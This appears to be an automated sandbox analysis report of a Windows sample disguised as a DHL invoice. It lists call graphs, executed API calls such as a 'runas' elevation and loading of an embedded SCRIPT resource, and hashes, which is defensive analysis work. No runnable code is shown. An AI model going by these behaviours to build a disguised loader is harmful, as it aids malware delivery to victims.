API calls messages 97572->97609 97574 33c3ac 97573->97574 97598 34ce17 22 API calls messages 97573->97598 97574->97504 97575->97505 97576->97501 97577->97506 97578->97516 97579->97516 97581 33ae01 97580->97581 97584 33ae1c messages 97580->97584 97582 33aec9 22 API calls 97581->97582 97583 33ae09 CharUpperBuffW 97582->97583 97583->97584 97584->97519 97586 33acae 97585->97586 97587 33acd1 97586->97587 97615 3a359c 82 API calls __wsopen_s 97586->97615 97587->97572 97590 33ad92 97589->97590 97591 37fadb 97589->97591 97592 34fddb 22 API calls 97590->97592 97593 33ad99 97592->97593 97616 33adcd 97593->97616 97596->97568 97597->97573 97598->97573 97599->97523 97600->97561 97601->97529 97602->97561 97603->97561 97604->97572 97605->97572 97606->97572 97607->97572 97608->97572 97609->97572 97610->97553 97611->97561 97612->97556 97613->97567 97614->97561 97615->97587 97620 33addd 97616->97620 97617 33adb6 97617->97572 97618 34fddb 22 API calls 97618->97620 97619 33a961 22 API calls 97619->97620 97620->97617 97620->97618 97620->97619 97621 33adcd 22 API calls 97620->97621 97622 33a8c7 22 API calls 97620->97622 97621->97620 97622->97620 97623 3503fb 97624 350407 CallCatchBlock 97623->97624 97652 34feb1 97624->97652 97626 35040e 97627 350561 97626->97627 97630 350438 97626->97630 97679 35083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97627->97679 97629 350568 97680 354e52 28 API calls _abort 97629->97680 97640 350477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97630->97640 97663 36247d 97630->97663 97632 35056e 97681 354e04 28 API calls _abort 97632->97681 97635 350576 97637 350457 97639 3504d8 97671 350959 97639->97671 97640->97639 97675 354e1a 38 API calls 2 library calls 97640->97675 97643 3504de 97644 3504f3 97643->97644 97676 350992 GetModuleHandleW 97644->97676 97646 3504fa 97646->97629 97647 3504fe 97646->97647 97648 350507 97647->97648 97677 354df5 28 API calls _abort 97647->97677 97678 350040 13 API calls 2 library calls 97648->97678 97651 35050f 97651->97637 97653 34feba 97652->97653 97682 350698 IsProcessorFeaturePresent 97653->97682 97655 34fec6 97683 352c94 10 API calls 3 library calls 97655->97683 97657 34fecb 97662 34fecf 97657->97662 97684 362317 97657->97684 97660 34fee6 97660->97626 97662->97626 97664 362494 97663->97664 97665 350a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97664->97665 97666 350451 97665->97666 97666->97637 97667 362421 97666->97667 97668 362450 97667->97668 97669 350a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97668->97669 97670 362479 97669->97670 97670->97640 97735 352340 97671->97735 97673 35096c GetStartupInfoW 97674 35097f 97673->97674 97674->97643 97675->97639 97676->97646 97677->97648 97678->97651 97679->97629 97680->97632 97681->97635 97682->97655 97683->97657 97688 36d1f6 97684->97688 97687 352cbd 8 API calls 3 library calls 97687->97662 97691 36d213 97688->97691 97692 36d20f 97688->97692 97689 350a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97690 34fed8 97689->97690 97690->97660 97690->97687 97691->97692 97694 364bfb 97691->97694 97692->97689 97695 364c07 CallCatchBlock 97694->97695 97706 362f5e EnterCriticalSection 97695->97706 97697 364c0e 97707 3650af 97697->97707 97699 364c1d 97700 364c2c 97699->97700 97720 364a8f 29 API calls 97699->97720 97722 364c48 LeaveCriticalSection _abort 97700->97722 97703 364c27 97721 364b45 GetStdHandle GetFileType 97703->97721 97704 364c3d __fread_nolock 97704->97691 97706->97697 97708 3650bb CallCatchBlock 97707->97708 97709 3650df 97708->97709 97710 3650c8 97708->97710 97723 362f5e EnterCriticalSection 97709->97723 97731 35f2d9 20 API calls __dosmaperr 97710->97731 97713 3650cd 97732 3627ec 26 API calls _strftime 97713->97732 97715 365117 97733 36513e LeaveCriticalSection _abort 97715->97733 97716 3650d7 __fread_nolock 97716->97699 97719 3650eb 97719->97715 97724 365000 97719->97724 97720->97703 97721->97700 97722->97704 97723->97719 97725 364c7d pre_c_initialization 20 API calls 97724->97725 97727 365012 97725->97727 97726 36501f 97728 3629c8 _free 20 API calls 97726->97728 97727->97726 97734 363405 11 API calls 2 library calls 97727->97734 97730 365071 97728->97730 97730->97719 97731->97713 97732->97716 97733->97716 97734->97727 97736 352357 97735->97736 97736->97673 97736->97736 97737 332de3 97738 332df0 __wsopen_s 97737->97738 97739 332e09 97738->97739 97740 372c2b ___scrt_fastfail 97738->97740 97741 333aa2 23 API calls 97739->97741 97742 372c47 GetOpenFileNameW 97740->97742 97743 332e12 97741->97743 97744 372c96 97742->97744 97753 332da5 97743->97753 97746 336b57 22 API calls 97744->97746 97749 372cab 97746->97749 97749->97749 97750 332e27 97771 3344a8 97750->97771 97754 371f50 __wsopen_s 97753->97754 97755 332db2 GetLongPathNameW 97754->97755 97756 336b57 22 API calls 97755->97756 97757 332dda 97756->97757 97758 333598 97757->97758 97759 33a961 22 API calls 97758->97759 97760 3335aa 97759->97760 97761 333aa2 23 API calls 97760->97761 97762 3335b5 97761->97762 97763 3335c0 97762->97763 97767 3732eb 97762->97767 97764 33515f 22 API calls 97763->97764 97766 3335cc 97764->97766 97801 3335f3 97766->97801 97769 37330d 97767->97769 97807 34ce60 41 API calls 97767->97807 97770 3335df 97770->97750 97772 334ecb 94 API calls 97771->97772 97773 3344cd 97772->97773 97774 373833 97773->97774 97776 334ecb 94 API calls 97773->97776 97775 3a2cf9 80 API calls 97774->97775 97777 373848 97775->97777 97778 3344e1 97776->97778 97780 37384c 97777->97780 97781 373869 97777->97781 97778->97774 97779 3344e9 97778->97779 97782 373854 97779->97782 97783 3344f5 97779->97783 97784 334f39 68 API calls 97780->97784 97785 34fe0b 22 API calls 97781->97785 97809 39da5a 82 API calls 97782->97809 97808 33940c 136 API calls 2 library calls 97783->97808 97784->97782 97798 3738ae 97785->97798 97788 332e31 97789 373862 97789->97781 97790 373a5f 97795 373a67 97790->97795 97791 334f39 68 API calls 97791->97795 97795->97791 97815 39989b 82 API calls __wsopen_s 97795->97815 97797 339cb3 22 API calls 97797->97798 97798->97790 97798->97795 97798->97797 97810 39967e 22 API calls __fread_nolock 97798->97810 97811 3995ad 42 API calls _wcslen 97798->97811 97812 3a0b5a 22 API calls 97798->97812 97813 33a4a1 22 API calls __fread_nolock 97798->97813 97814 333ff7 22 API calls 97798->97814 97802 333624 __fread_nolock 97801->97802 97803 333605 97801->97803 97804 34fddb 22 API calls 97802->97804 97806 34fe0b 22 API calls 97803->97806 97805 33363b 97804->97805 97805->97770 97806->97802 97807->97767 97808->97788 97809->97789 97810->97798 97811->97798 97812->97798 97813->97798 97814->97798 97815->97795 97816 eaf0b8 97817 eacd08 GetPEB 97816->97817 97818 eaf165 97817->97818 97830 eaefa8 97818->97830 97831 eaefb1 Sleep 97830->97831 97832 eaefbf 97831->97832 97833 372ba5 97834 332b25 97833->97834 97835 372baf 97833->97835 97861 332b83 7 API calls 97834->97861 97837 333a5a 24 API calls 97835->97837 97839 372bb8 97837->97839 97841 339cb3 22 API calls 97839->97841 97842 372bc6 97841->97842 97844 372bf5 97842->97844 97845 372bce 97842->97845 97843 332b2f 97846 332b44 97843->97846 97849 333837 49 API calls 97843->97849 97848 3333c6 22 API calls 97844->97848 97847 3333c6 22 API calls 97845->97847 97852 332b5f 97846->97852 97865 3330f2 Shell_NotifyIconW ___scrt_fastfail 97846->97865 97850 372bd9 97847->97850 97851 372bf1 GetForegroundWindow ShellExecuteW 97848->97851 97849->97846 97853 336350 22 API calls 97850->97853 97857 372c26 97851->97857 97858 332b66 SetCurrentDirectoryW 97852->97858 97856 372be7 97853->97856 97859 3333c6 22 API calls 97856->97859 97857->97852 97860 332b7a 97858->97860 97859->97851 97866 332cd4 7 API calls 97861->97866 97863 332b2a 97864 332c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97863->97864 97864->97843 97865->97852 97866->97863 97867 368402 97872 3681be 97867->97872 97870 36842a 97877 3681ef try_get_first_available_module 97872->97877 97874 3683ee 97891 3627ec 26 API calls _strftime 97874->97891 97876 368343 97876->97870 97884 370984 97876->97884 97880 368338 97877->97880 97887 358e0b 40 API calls 2 library calls 97877->97887 97879 36838c 97879->97880 97888 358e0b 40 API calls 2 library calls 97879->97888 97880->97876 97890 35f2d9 20 API calls __dosmaperr 97880->97890 97882 3683ab 97882->97880 97889 358e0b 40 API calls 2 library calls 97882->97889 97892 370081 97884->97892 97886 37099f 97886->97870 97887->97879 97888->97882 97889->97880 97890->97874 97891->97876 97894 37008d CallCatchBlock 97892->97894 97893 37009b 97950 35f2d9 20 API calls __dosmaperr 97893->97950 97894->97893 97896 3700d4 97894->97896 97903 37065b 97896->97903 97897 3700a0 97951 3627ec 26 API calls _strftime 97897->97951 97902 3700aa __fread_nolock 97902->97886 97953 37042f 97903->97953 97906 3706a6 97971 365221 97906->97971 97907 37068d 97985 35f2c6 20 API calls __dosmaperr 97907->97985 97910 370692 97986 35f2d9 20 API calls __dosmaperr 97910->97986 97911 3706ab 97912 3706b4 97911->97912 97913 3706cb 97911->97913 97987 35f2c6 20 API calls __dosmaperr 97912->97987 97984 37039a CreateFileW 97913->97984 97917 3706b9 97988 35f2d9 20 API calls __dosmaperr 97917->97988 97918 370781 GetFileType 97921 3707d3 97918->97921 97922 37078c GetLastError 97918->97922 97920 370756 GetLastError 97990 35f2a3 20 API calls 2 library calls 97920->97990 97993 36516a 21 API calls 3 library calls 97921->97993 97991 35f2a3 20 API calls 2 library calls 97922->97991 97923 370704 97923->97918 97923->97920 97989 37039a CreateFileW 97923->97989 97927 37079a CloseHandle 97927->97910 97930 3707c3 97927->97930 97929 370749 97929->97918 97929->97920 97992 35f2d9 20 API calls __dosmaperr 97930->97992 97931 3707f4 97933 370840 97931->97933 97994 3705ab 72 API calls 4 library calls 97931->97994 97938 37086d 97933->97938 97995 37014d 72 API calls 4 library calls 97933->97995 97934 3707c8 97934->97910 97937 370866 97937->97938 97940 37087e 97937->97940 97939 3686ae __wsopen_s 29 API calls 97938->97939 97941 3700f8 97939->97941 97940->97941 97942 3708fc CloseHandle 97940->97942 97952 370121 LeaveCriticalSection __wsopen_s 97941->97952 97996 37039a CreateFileW 97942->97996 97944 370927 97945 37095d 97944->97945 97946 370931 GetLastError 97944->97946 97945->97941 97997 35f2a3 20 API calls 2 library calls 97946->97997 97948 37093d 97998 365333 21 API calls 3 library calls 97948->97998 97950->97897 97951->97902 97952->97902 97954 37046a 97953->97954 97955 370450 97953->97955 97999 3703bf 97954->97999 97955->97954 98006 35f2d9 20 API calls __dosmaperr 97955->98006 97958 37045f 98007 3627ec 26 API calls _strftime 97958->98007 97960 3704a2 97961 3704d1 97960->97961 98008 35f2d9 20 API calls __dosmaperr 97960->98008 97969 370524 97961->97969 98010 35d70d 26 API calls 2 library calls 97961->98010 97964 37051f 97966 37059e 97964->97966 97964->97969 97965 3704c6 98009 3627ec 26 API calls _strftime 97965->98009 98011 3627fc 11 API calls _abort 97966->98011 97969->97906 97969->97907 97970 3705aa 97972 36522d CallCatchBlock 97971->97972 98014 362f5e EnterCriticalSection 97972->98014 97974 36527b 98015 36532a 97974->98015 97976 365234 97976->97974 97977 365259 97976->97977 97981 3652c7 EnterCriticalSection 97976->97981 97979 365000 __wsopen_s 21 API calls 97977->97979 97978 3652a4 __fread_nolock 97978->97911 97980 36525e 97979->97980 97980->97974 98018 365147 EnterCriticalSection 97980->98018 97981->97974 97982 3652d4 LeaveCriticalSection 97981->97982 97982->97976 97984->97923 97985->97910 97986->97941 97987->97917 97988->97910 97989->97929 97990->97910 97991->97927 97992->97934 97993->97931 97994->97933 97995->97937 97996->97944 97997->97948 97998->97945 98001 3703d7 97999->98001 98000 3703f2 98000->97960 98001->98000 98012 35f2d9 20 API calls __dosmaperr 98001->98012 98003 370416 98013 3627ec 26 API calls _strftime 98003->98013 98005 370421 98005->97960 98006->97958 98007->97954 98008->97965 98009->97961 98010->97964 98011->97970 98012->98003 98013->98005 98014->97976 98019 362fa6 LeaveCriticalSection 98015->98019 98017 365331 98017->97978 98018->97974 98019->98017 98020 331044 98025 3310f3 98020->98025 98022 33104a 98061 3500a3 29 API calls __onexit 98022->98061 98024 331054 98062 331398 98025->98062 98029 33116a 98030 33a961 22 API calls 98029->98030 98031 331174 98030->98031 98032 33a961 22 API calls 98031->98032 98033 33117e 98032->98033 98034 33a961 22 API calls 98033->98034 98035 331188 98034->98035 98036 33a961 22 API calls 98035->98036 98037 3311c6 98036->98037 98038 33a961 22 API calls 98037->98038 98039 331292 98038->98039 98072 33171c 98039->98072 98043 3312c4 98044 33a961 22 API calls 98043->98044 98045 3312ce 98044->98045 98046 341940 9 API calls 98045->98046 98047 3312f9 98046->98047 98093 331aab 98047->98093 98049 331315 98050 331325 GetStdHandle 98049->98050 98051 372485 98050->98051 98052 33137a 98050->98052 98051->98052 98053 37248e 98051->98053 98055 331387 OleInitialize 98052->98055 98054 34fddb 22 API calls 98053->98054 98056 372495 98054->98056 98055->98022 98100 3a011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 98056->98100 98058 37249e 98101 3a0944 CreateThread 98058->98101 98060 3724aa CloseHandle 98060->98052 98061->98024 98102 3313f1 98062->98102 98065 3313f1 22 API calls 98066 3313d0 98065->98066 98067 33a961 22 API calls 98066->98067 98068 3313dc 98067->98068 98069 336b57 22 API calls 98068->98069 98070 331129 98069->98070 98071 331bc3 6 API calls 98070->98071 98071->98029 98073 33a961 22 API calls 98072->98073 98074 33172c 98073->98074 98075 33a961 22 API calls 98074->98075 98076 331734 98075->98076 98077 33a961 22 API calls 98076->98077 98078 33174f 98077->98078 98079 34fddb 22 API calls 98078->98079 98080 33129c 98079->98080 98081 331b4a 98080->98081 98082 331b58 98081->98082 98083 33a961 22 API calls 98082->98083 98084 331b63 98083->98084 98085 33a961 22 API calls 98084->98085 98086 331b6e 98085->98086 98087 33a961 22 API calls 98086->98087 98088 331b79 98087->98088 98089 33a961 22 API calls 98088->98089 98090 331b84 98089->98090 98091 34fddb 22 API calls 98090->98091 98092 331b96 RegisterWindowMessageW 98091->98092 98092->98043 98094 331abb 98093->98094 98095 37272d 98093->98095 98097 34fddb 22 API calls 98094->98097 98109 3a3209 23 API calls 98095->98109 98099 331ac3 98097->98099 98098 372738 98099->98049 98100->98058 98101->98060 98110 3a092a 28 API calls 98101->98110 98103 33a961 22 API calls 98102->98103 98104 3313fc 98103->98104 98105 33a961 22 API calls 98104->98105 98106 331404 98105->98106 98107 33a961 22 API calls 98106->98107 98108 3313c6 98107->98108 98108->98065 98109->98098 98111 382a00 98126 33d7b0 messages 98111->98126 98112 33db11 PeekMessageW 98112->98126 98113 33d807 GetInputState 98113->98112 98113->98126 98115 381cbe TranslateAcceleratorW 98115->98126 98116 33db8f PeekMessageW 98116->98126 98117 33da04 timeGetTime 98117->98126 98118 33db73 TranslateMessage DispatchMessageW 98118->98116 98119 33dbaf Sleep 98141 33dbc0 98119->98141 98120 382b74 Sleep 98120->98141 98121 34e551 timeGetTime 98121->98141 98122 381dda timeGetTime 98172 34e300 23 API calls 98122->98172 98125 382c0b GetExitCodeProcess 98129 382c21 WaitForSingleObject 98125->98129 98130 382c37 CloseHandle 98125->98130 98126->98112 98126->98113 98126->98115 98126->98116 98126->98117 98126->98118 98126->98119 98126->98120 98126->98122 98132 33d9d5 98126->98132 98137 33ec40 235 API calls 98126->98137 98139 341310 235 API calls 98126->98139 98140 33bf40 235 API calls 98126->98140 98143 33dfd0 98126->98143 98166 34edf6 98126->98166 98171 33dd50 235 API calls 98126->98171 98173 3a3a2a 23 API calls 98126->98173 98174 3a359c 82 API calls __wsopen_s 98126->98174 98127 3c29bf GetForegroundWindow 98127->98141 98129->98126 98129->98130 98130->98141 98131 382a31 98131->98132 98133 382ca9 Sleep 98133->98126 98137->98126 98139->98126 98140->98126 98141->98121 98141->98125 98141->98126 98141->98127 98141->98131 98141->98132 98141->98133 98175 3b5658 23 API calls 98141->98175 98176 39e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98141->98176 98177 39d4dc 47 API calls 98141->98177 98144 33e010 98143->98144 98155 33e0dc messages 98144->98155 98180 350242 5 API calls __Init_thread_wait 98144->98180 98147 382fca 98149 33a961 22 API calls 98147->98149 98147->98155 98148 33a961 22 API calls 98148->98155 98152 382fe4 98149->98152 98181 3500a3 29 API calls __onexit 98152->98181 98155->98148 98159 33a8c7 22 API calls 98155->98159 98160 3404f0 22 API calls 98155->98160 98161 33ec40 235 API calls 98155->98161 98162 33e3e1 98155->98162 98165 3a359c 82 API calls 98155->98165 98178 33a81b 41 API calls 98155->98178 98179 34a308 235 API calls 98155->98179 98183 350242 5 API calls __Init_thread_wait 98155->98183 98184 3500a3 29 API calls __onexit 98155->98184 98185 3501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98155->98185 98186 3b47d4 235 API calls 98155->98186 98187 3b68c1 235 API calls 98155->98187 98156 382fee 98182 3501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98156->98182 98159->98155 98160->98155 98161->98155 98162->98126 98165->98155 98167 34ee09 98166->98167 98169 34ee12 98166->98169 98167->98126 98168 34ee36 IsDialogMessageW 98168->98167 98168->98169 98169->98167 98169->98168 98170 38efaf GetClassLongW 98169->98170 98170->98168 98170->98169 98171->98126 98172->98126 98173->98126 98174->98126 98175->98141 98176->98141 98177->98141 98178->98155 98179->98155 98180->98147 98181->98156 98182->98155 98183->98155 98184->98155 98185->98155 98186->98155 98187->98155 98188 383a41 98192 3a10c0 98188->98192 98190 383a4c 98191 3a10c0 53 API calls 98190->98191 98191->98190 98198 3a10fa 98192->98198 98200 3a10cd 98192->98200 98193 3a10fc 98204 34fa11 53 API calls 98193->98204 98195 3a1101 98196 337510 53 API calls 98195->98196 98197 3a1108 98196->98197 98199 336350 22 API calls 98197->98199 98198->98190 98199->98198 98200->98193 98200->98195 98200->98198 98201 3a10f4 98200->98201 98203 33b270 39 API calls 98201->98203 98203->98198 98204->98195 98205 331cad SystemParametersInfoW

                                                                                                                        Executed Functions

                                                                                                                        Function 003342DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 234 3342de-33434d call 33a961 GetVersionExW call 336b57 239 373617-37362a 234->239 240 334353 234->240 242 37362b-37362f 239->242 241 334355-334357 240->241 243 373656 241->243 244 33435d-3343bc call 3393b2 call 3337a0 241->244 245 373632-37363e 242->245 246 373631 242->246 250 37365d-373660 243->250 263 3343c2-3343c4 244->263 264 3737df-3737e6 244->264 245->242 247 373640-373642 245->247 246->245 247->241 249 373648-37364f 247->249 249->239 252 373651 249->252 253 373666-3736a8 250->253 254 33441b-334435 GetCurrentProcess IsWow64Process 250->254 252->243 253->254 258 3736ae-3736b1 253->258 256 334437 254->256 257 334494-33449a 254->257 260 33443d-334449 256->260 257->260 261 3736b3-3736bd 258->261 262 3736db-3736e5 258->262 265 373824-373828 GetSystemInfo 260->265 266 33444f-33445e LoadLibraryA 260->266 267 3736bf-3736c5 261->267 268 3736ca-3736d6 261->268 270 3736e7-3736f3 262->270 271 3736f8-373702 262->271 263->250 269 3343ca-3343dd 263->269 272 373806-373809 264->272 273 3737e8 264->273 276 334460-33446e GetProcAddress 266->276 277 33449c-3344a6 GetSystemInfo 266->277 267->254 268->254 278 3343e3-3343e5 269->278 279 373726-37372f 269->279 270->254 281 373715-373721 271->281 282 373704-373710 271->282 274 3737f4-3737fc 272->274 275 37380b-37381a 272->275 280 3737ee 273->280 274->272 275->280 285 37381c-373822 275->285 276->277 286 334470-334474 GetNativeSystemInfo 276->286 287 334476-334478 277->287 288 3343eb-3343ee 278->288 289 37374d-373762 278->289 283 373731-373737 279->283 284 37373c-373748 279->284 280->274 281->254 282->254 283->254 284->254 285->274 286->287 292 334481-334493 287->292 293 33447a-33447b FreeLibrary 287->293 294 373791-373794 288->294 295 3343f4-33440f 288->295 290 373764-37376a 289->290 291 37376f-37377b 289->291 290->254 291->254 293->292 294->254 298 37379a-3737c1 294->298 296 334415 295->296 297 373780-37378c 295->297 296->254 297->254 299 3737c3-3737c9 298->299 300 3737ce-3737da 298->300 299->254 300->254
                                                                                                                        APIs
                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 0033430D
                                                                                                                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                                                                                                                        • GetCurrentProcess.KERNEL32(?,003CCB64,00000000,?,?), ref: 00334422
                                                                                                                        • IsWow64Process.KERNEL32(00000000,?,?), ref: 00334429
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00334454
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00334466
                                                                                                                        • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00334474
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0033447B
                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?), ref: 003344A0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                        • API String ID: 3290436268-3101561225
                                                                                                                        • Opcode ID: 4d0d03470150862beeac6b7e1cf87356d5eab0abcfba59b1b0ab6dd7f884f421
                                                                                                                        • Instruction ID: 6330e2413d45885af5e8023fbe68d421b5665a6b92e2d8e15fde8dc79b87d354
                                                                                                                        • Opcode Fuzzy Hash: 4d0d03470150862beeac6b7e1cf87356d5eab0abcfba59b1b0ab6dd7f884f421
                                                                                                                        • Instruction Fuzzy Hash: 5FA1B87192A2C0DFE727C76A7EC15957FE87B26300F0894B9E885F3A32D2345914DB29
                                                                                                                        Function 003342A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1214 3342a2-3342ba CreateStreamOnHGlobal 1215 3342da-3342dd 1214->1215 1216 3342bc-3342d3 FindResourceExW 1214->1216 1217 3342d9 1216->1217 1218 3735ba-3735c9 LoadResource 1216->1218 1217->1215 1218->1217 1219 3735cf-3735dd SizeofResource 1218->1219 1219->1217 1220 3735e3-3735ee LockResource 1219->1220 1220->1217 1221 3735f4-373612 1220->1221 1221->1217
                                                                                                                        APIs
                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,003350AA,?,?,00000000,00000000), ref: 003342B2
                                                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,003350AA,?,?,00000000,00000000), ref: 003342C9
                                                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,003350AA,?,?,00000000,00000000,?,?,?,?,?,?,00334F20), ref: 003735BE
                                                                                                                        • SizeofResource.KERNEL32(?,00000000,?,?,003350AA,?,?,00000000,00000000,?,?,?,?,?,?,00334F20), ref: 003735D3
                                                                                                                        • LockResource.KERNEL32(003350AA,?,?,003350AA,?,?,00000000,00000000,?,?,?,?,?,?,00334F20,?), ref: 003735E6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                        • String ID: SCRIPT
                                                                                                                        • API String ID: 3051347437-3967369404
                                                                                                                        • Opcode ID: 66416d8bd0581f03bdee432686227283083aff62fb32698c9a84c54625863c25
                                                                                                                        • Instruction ID: 3ef04f97af142eeb93259d9b2add555444f35f51f00ca5425217e8decba28034
                                                                                                                        • Opcode Fuzzy Hash: 66416d8bd0581f03bdee432686227283083aff62fb32698c9a84c54625863c25
                                                                                                                        • Instruction Fuzzy Hash: FF115A70200700AFDB228BA6DC88F677BBDEBC6B51F158969F416D6650DB71EC008B20
                                                                                                                        Function 00372BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00332B6B
                                                                                                                          • Part of subcall function 00333A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00401418,?,00332E7F,?,?,?,00000000), ref: 00333A78
                                                                                                                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                                                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,?,?,003F2224), ref: 00372C10
                                                                                                                        • ShellExecuteW.SHELL32(00000000,?,?,003F2224), ref: 00372C17
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                                                        • String ID: runas
                                                                                                                        • API String ID: 448630720-4000483414
                                                                                                                        • Opcode ID: 105cb18b8c5c73cec769b0af6411387e9afcd2398f8f1a9fd229738e5d00ddc9
                                                                                                                        • Instruction ID: a3c28b5b15a01c791280222b21edfa5fd349a1956df03e86cc24d857c66d3143
                                                                                                                        • Opcode Fuzzy Hash: 105cb18b8c5c73cec769b0af6411387e9afcd2398f8f1a9fd229738e5d00ddc9
                                                                                                                        • Instruction Fuzzy Hash: 50118131208345AAC717FF60D8D2ABFB7A89B91351F44942DF1865B0B2CF759A49C712
                                                                                                                        Function 0039DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(?,00375222), ref: 0039DBCE
                                                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 0039DBDD
                                                                                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 0039DBEE
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0039DBFA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
